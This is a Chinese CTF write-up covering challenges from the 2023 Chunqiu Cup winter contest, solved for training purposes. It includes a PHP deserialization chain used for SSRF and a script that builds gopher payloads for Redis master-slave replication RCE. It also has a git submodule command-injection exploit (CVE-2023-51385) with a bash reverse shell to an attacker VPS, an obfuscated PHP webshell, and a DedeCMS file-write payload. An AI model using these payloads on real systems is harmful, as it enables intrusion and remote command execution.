春秋杯冬季赛 2023 Writeup
11 min read
写在前面
着实没时间去做题,不过是第一次通过 SSRF 利用 Redis 主从复制实现命令执行,同时也是第一次打公开的 RDG 模式,所以记录一下。
可信计算
基于挑战码的双向认证1
完整题目背景及描述请见附件。
(请点击“下发赛题”,本题容器下发后的端口是ssh端口,ssh的账号为player,密码为player,ssh登录上去可自行修改密码。登录后请根据题目要求解题),本场景有2个flag,此处提交flag1
年年出可信计算,年年非预期。
grep -ra "flag{" /root
基于挑战码的双向认证1
完整题目背景及描述请见附件。
(请点击“下发赛题”,本题容器下发后的端口是ssh端口,ssh的账号为player,密码为player,ssh登录上去可自行修改密码。登录后请根据题目要求解题),本场景有2个flag,此处提交flag2
同上题。
Web
ezezez_php
小小同学说大佬轻点打!!!
<?php
highlight_file(__FILE__);
include "function.php";
class Rd
{
public $ending;
public $cl;
public $poc;
public function __destruct()
{
echo "All matters have concluded"."</br>";
}
public function __call($name, $arg)
{
foreach ($arg as $key => $value) {
if ($arg[0]['POC'] == "0.o") {
$this->cl->var1 = "get";
}
}
}
}
class Poc
{
public $payload;
public $fun;
public function __set($name, $value)
{
$this->payload = $name;
$this->fun = $value;
}
function getflag($paylaod)
{
echo "Have you genuinely accomplished what you set out to do?"."</br>";
file_get_contents($paylaod);
}
}
class Er
{
public $symbol;
public $Flag;
public function __construct()
{
$this->symbol = True;
}
public function __set($name, $value)
{
if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){
$value($this->Flag);
}
else {
echo "NoNoNo,please you can look hint.php"."</br>";
}
}
}
class Ha
{
public $start;
public $start1;
public $start2;
public function __construct()
{
echo $this->start1 . "__construct" . "</br>";
}
public function __destruct()
{
if ($this->start2 === "o.0") {
$this->start1->Love($this->start);
echo "You are Good!"."</br>";
}
}
}
function get($url) {
$url=base64_decode($url);
var_dump($url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
var_dump($result_info);
curl_close($ch);
var_dump($output);
}
if (isset($_POST['pop'])) {
$a = unserialize($_POST['pop']);
} else {
die("You are Silly goose!");
}
?>一看到 curl() 以及 hint.php 里的内容,猜测肯定就是考察 Redis Rce 了
<?php
highlight_file(__FILE__);
$hint = "Not db,but 127.0.0.1!!!redis-flag{really}";
?>我们先构造出初始反序列化代码,挺简单的POP链
unserialize() -> Ha() -> __destruct() -> Rd() -> __call() -> Er -> __set()<?php
Class Rd{
public $ending;
public $cl;
public $poc;
}
class Er{
public $symbol;
public $Flag;
}
class Ha{
public $start;
public $start1;
public $start2;
}
$flag = new Ha();
$flag -> start2 = "o.0";
$flag -> start1 = new Rd();
$flag -> start = ['POC'=>'0.o'];
$flag -> start1 -> cl = new Er();
$flag -> start1 -> cl -> Flag = base64_encode('dict://127.0.0.1:6379/info');
echo urldecode(serialize($flag));在 Redis 中,getshell 的方法无非就那几种:计划任务、写文件 和 主从复制
这里我尝试了前两种,均无法实现,同时经过测试发现该题目出网,我们直接利用 主从复制 进行 getshell
首先我们通过 Dliv3/redis-rogue-server 启动 Redis 主节点,注意由于我们攻击的是内网 Redis,故需要添加 --server-only 参数
然后我们通过下方的脚本生成恶意payload,注意分两次进行发送(第一次是连接从节点,第二次时载入恶意 exp.so 文件)
import requests
import re
def urlencode(data):
enc_data = ''
for i in data:
h = str(hex(ord(i))).replace('0x', '')
if len(h) == 1:
enc_data += '%0' + h.upper()
else:
enc_data += '%' + h.upper()
return enc_data
def gen_payload(payload):
redis_payload = ''
for i in payload.split('\n'):
arg_num = '*' + str(len(i.split(' ')))
redis_payload += arg_num + '\r\n'
for j in i.split(' '):
arg_len = '$' + str(len(j))
redis_payload += arg_len + '\r\n'
redis_payload += j + '\r\n'
gopher_payload = 'gopher://127.0.0.1:6379/_' + urlencode(redis_payload)
return gopher_payload
# ip 和 port 修改为实际的
payload1 = '''
slaveof ip port
config set dir /tmp
config set dbfilename exp.so
quit
'''
# system.exec 'env' 为你要执行的命令
payload2 = '''slaveof no one
module load /tmp/exp.so
system.exec 'env'
quit
'''
print(gen_payload(payload1))
print(gen_payload(payload2))
Misc
谁偷吃了我的外卖
小凯最近入职了大厂,但是在工作途中出现了一些麻烦事,怎么办呢
下载附件得到一张图片,通过 foremost 得到一个压缩包,同时压缩包注释中存在 hint
I can give you a hint: - = /
But there was a takeaway that was partially eaten.
同时,我们发现 用户xx_ 后面 4位 像是 Base64 编码,我们写代码遍历出来。另外我们结合提示,将文件名中的 - 替换为 /
当时我一直以为它指的是三个符号 减号,等号和斜杠,没想到指的是减号等于斜杠
import re
import base64
import zipfile
def getFileid(name):
match = re.search(r'\d+', name)
return int(match.group()) if match else float('inf')
def getFilelist(path):
file_list = []
with zipfile.ZipFile(path, 'r') as zip_ref:
file_list = [file for file in zip_ref.namelist()]
return sorted(file_list, key=getFileid)
def getNamebase(name):
match = re.match(r'(.+)\d+_(.{4})', name)
return match.group(2).replace('-', '/') if match else ''
data = ''
for file in getFilelist('外卖箱.zip'):
# print(getNamebase(file), end='')
data += getNamebase(file)
with open('data.bin', 'wb') as file:
file.write(base64.b64decode(data))运行代码后得到 data.bin,我们使用 foremost 进行分类即可得到一个压缩文件,里面拥有一个 钥匙.png,打开发现是用 Bandizip 压缩的一张图,我们直接进行明文攻击即可。
分别在 小凯的奋斗故事.md 和 txt.galf 中得到 flag 片段,最终 flag 如下
flag{W1sh_y0u_AaaAaaaaaaaaaaa_w0nderfu1_CTF_journe9}modules
爱学习的小楠楠在复现某个CVE,搭建了本场景,你能获取到本场景下的flag吗?
参考这篇复现文章 CVE-2023-51385,分别创建 .gitmodules 和 shell.sh 即可(其实还有个非预期的解法,直接在 Gitee 根据时间排序检索该漏洞号,可以搜到其他参赛者创建的仓库,直接 fork 后修改反弹地址即可)
# .gitmodules
[submodule "cve"]
path = cve
url = https://`echo helloworld > cve.txt`foo.ichunqiu.com/bar
[submodule "test"]
path = test
url = ssh://`bash shell.sh`foo.ichunqiu.com/bar# shell.sh
bash -i >& /dev/tcp/vps_ip/5000 0>&1
明文混淆
小明新买了一台windows电脑,给了小文一个经过两层混淆的webshell,,但压缩包密码搞忘了。听说webshell密码是一个叫flag的东西。。。
根据常见开源协议文件进行爆破,例如 MIT、GPL 和 Apache 之类的,通过 GPL 协议爆破成功,注意,已知明文只需要大于 12 位即可
给定密文和12个或更多字节的对应明文,可以恢复密钥流生成器的内部状态。
GNU GENERAL PUBLIC LICENSE我们通过 bkcrack 得到密钥 7163444a 203b76b0 17de1387,通过已知密钥得到压缩包密码 R05VIEdQTHYz
<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0idVNxTHlDandXcFpIaGlLbWZGR1ZUQmFOcllvSXpsZWd4Sk1iUkRVRUFrUWN0bnZzZE9QWGladnVUYWdmY0hiWFloZVdNeUtObEx3U2pvQ25ydEFCeE9RRHNKcGRrUG1JekdFVlJVRnFGSjlmd1hrZWJxYllEYVlHQVd0aWJXeFlSS3BDb1d5cmJsbzBxMnN0bzI5UGJaQkdObExHUnlRNEF0T2dzUFNlc2E5THBkc0VEeVJwVVhzZU5kVjRScDVyUjNtNHNkUkZJR0hPSTJ0bmJQdGxTS3oybEdIYkFHSE53Z3k1TlBiTk5QejROV0M1TnJMMElXU2RtcGQ5RlpJSGVaUDdua0MvRkI9PSI7ZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));
?>直接挨个 var_dump() 即可
<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
$OO0000=$O00OO0{7}.$O00OO0{13};
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("JE8wTzAwMD0idVNxTHlDandXcFpIaGlLbWZGR1ZUQmFOcllvSXpsZWd4Sk1iUkRVRUFrUWN0bnZzZE9QWGladnVUYWdmY0hiWFloZVdNeUtObEx3U2pvQ25ydEFCeE9RRHNKcGRrUG1JekdFVlJVRnFGSjlmd1hrZWJxYllEYVlHQVd0aWJXeFlSS3BDb1d5cmJsbzBxMnN0bzI5UGJaQkdObExHUnlRNEF0T2dzUFNlc2E5THBkc0VEeVJwVVhzZU5kVjRScDVyUjNtNHNkUkZJR0hPSTJ0bmJQdGxTS3oybEdIYkFHSE53Z3k1TlBiTk5QejROV0M1TnJMMElXU2RtcGQ5RlpJSGVaUDdua0MvRkI9PSI7ZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));
$O0O000="uSqLyCjwWpZHhiKmfFGVTBaNrYoIzlegxJMbRDUEAkQctnvsdOPXiZvuTagfcHbXYheWMyKNlLwSjoCnrtABxOQDsJpdkPmIzGEVRUFqFJ9fwXkebqbYDaYGAWtibWxYRKpCoWyrblo0q2sto29PbZBGNlLGRyQ4AtOgsPSesa9LpdsEDyRpUXseNdV4Rp5rR3m4sdRFIGHOI2tnbPtlSKz2lGHbAGHNwgy5NPbNNPz4NWC5NrL0IWSdmpd9FZIHeZP7nkC/FB==";
var_dump($O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));
// eval(gzinflate(base64_decode('U0gtS8zRcFCJD/APDolWT8tJTK8uNswt8DGOrzIsiHfIS4kvNzYzzUj1yVFUVKxVj9W0trcDAA==')))
var_dump(gzinflate(base64_decode('U0gtS8zRcFCJD/APDolWT8tJTK8uNswt8DGOrzIsiHfIS4kvNzYzzUj1yVFUVKxVj9W0trcDAA==')));
// eval(@$_POST['flag{s1mpL3_z1p_@nd_w365heLl!!!}']);
?>挑战题
ezdede
你成功地对这种勒索病毒进行了分析,获取了它的加密密钥,解密了你的公司的数据,你也利用了它的一个传播特征,找出了它的入侵点,清除了它的痕迹,你的公司的网络系统恢复了正常。你发现这种勒索病毒是通过电子邮件的附件,或者网络共享的文件,或者远程桌面的连接,或者USB设备的插入,或者其他的方式,进入了你的公司的网络系统。你决定对黑客进行反向渗透,以防止勒索病毒的进一步传播。
(关注微信公众号“勒索病毒头条”,发送关键词“编织梦境”可获取该题提示。)
通过公众号获得提示:弱口令为:admin@123;挖掘最新版本为 V5.7.112 的后台 rce
参考文章复现即可 DedeCMS V5.7 SP2后台存在代码执行漏洞,另外写马的时候有过滤,使用短标签和 readfile() 即可绕过
<?=readfile('/flag')?>
然后访问以下路径即可得到 flag
/include/taglib/secnote.lib.phpRDG
had00p
此场景需要排查一个风险点;风险点排查修补后;才可以防御成功。如果存在需要重启服务的地方,系统会自动重启,不需要选手在修补包中添加命令。
修补白名单命令: [‘mv’, ‘cp’, ‘chmod’,‘sed’,‘export’,‘echo’,‘mkdir’,‘hostname’],修补后服务会自动重启
我们直接给 HDFS 设置上权限即可成功修复
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="configuration.xsl"?>
<!--
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. See accompanying LICENSE file.
-->
<!-- Put site-specific property overrides in this file. -->
<configuration>
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
</property>
</configuration><?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="configuration.xsl"?>
<!--
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. See accompanying LICENSE file.
-->
<!-- Put site-specific property overrides in this file. -->
<configuration>
<property>
<name>dfs.namenode.acls.enabled</name>
<value>true</value>
</property>
<property>
<name>dfs.namenode.acls.enabled</name>
<value>true</value>
</property>
</configuration>#!/bin/sh
# 设置Hadoop相关环境变量
export HADOOP_SECURE_DN_USER=hdfs
export HADOOP_SECURE_DN_PORT=1004
export HADOOP_SECURE_DN_LOG_DIR=${HADOOP_LOG_DIR}/hdfs
# 处理core-site.xml
mv file1 /usr/local/hadoop/share/hadoop/common/templates/core-site.xml
chmod 777 /usr/local/hadoop/share/hadoop/common/templates/core-site.xml
mv file1 /usr/local/hadoop/etc/hadoop/core-site.xml
chmod 777 /usr/local/hadoop/etc/hadoop/core-site.xml
mv file1 /usr/local/hadoop/input/core-site.xml
chmod 777 /usr/local/hadoop/input/core-site.xml
# 处理hdfs-site.xml
mv file2 /usr/local/hadoop/share/hadoop/hdfs/templates/hdfs-site.xml
chmod 777 /usr/local/hadoop/share/hadoop/hdfs/templates/hdfs-site.xml
mv file2 /usr/local/hadoop/etc/hadoop/hdfs-site.xml
chmod 777 /usr/local/hadoop/etc/hadoop/hdfs-site.xml
mv file2 /usr/local/hadoop/input/hdfs-site.xml
chmod 777 /usr/local/hadoop/input/hdfs-site.xml